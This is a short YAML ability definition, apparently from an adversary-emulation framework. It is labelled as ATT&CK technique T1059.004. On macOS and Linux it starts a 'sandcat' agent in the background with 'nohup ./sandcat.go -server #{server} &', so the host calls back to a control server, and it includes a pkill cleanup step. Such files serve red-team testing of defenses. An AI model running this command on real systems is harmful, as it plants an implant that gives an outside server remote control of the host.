- id: b1d41972-3ad9-4aa1-8f7f-05f049a2980e
  name: Start 54ndc47
  description: Start a new 54ndc47 agent in background
  tactic: execution
  technique:
    attack_id: T1059.004
    name: "Command and Scripting Interpreter: Unix Shell"
  platforms:
    darwin:
      sh:
        command: |
          nohup ./sandcat.go -server #{server} &
        cleanup: |
          pkill -f sandcat
        payloads:
        - sandcat.go
    linux:
      sh:
        command: |
          nohup ./sandcat.go -server #{server} &
        cleanup: |
          pkill -f sandcat
        payloads:
        - sandcat.go
  singleton: True
